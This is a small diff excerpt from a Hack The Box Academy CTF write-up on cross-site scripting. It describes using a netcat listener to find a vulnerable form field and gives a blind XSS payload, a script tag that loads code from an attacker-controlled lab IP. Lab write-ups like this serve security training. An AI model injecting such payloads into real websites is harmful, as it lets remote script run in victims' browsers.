DjikstraCS/CTF-Write-Ups/Hack The box/Academy/Cross-Site Scripting (XSS).md

 We need to find the vulnerable field.

-Like in the previous question we will set up a netcat listener and insert payloads into all the fields we want to test for vulnerability.
+Like in the previous question, we will set up a netcat listener and insert payloads into all the fields we want to test for vulnerability.

 Payload, web: `Haxx><script src="http://10.10.15.133/web"></script>`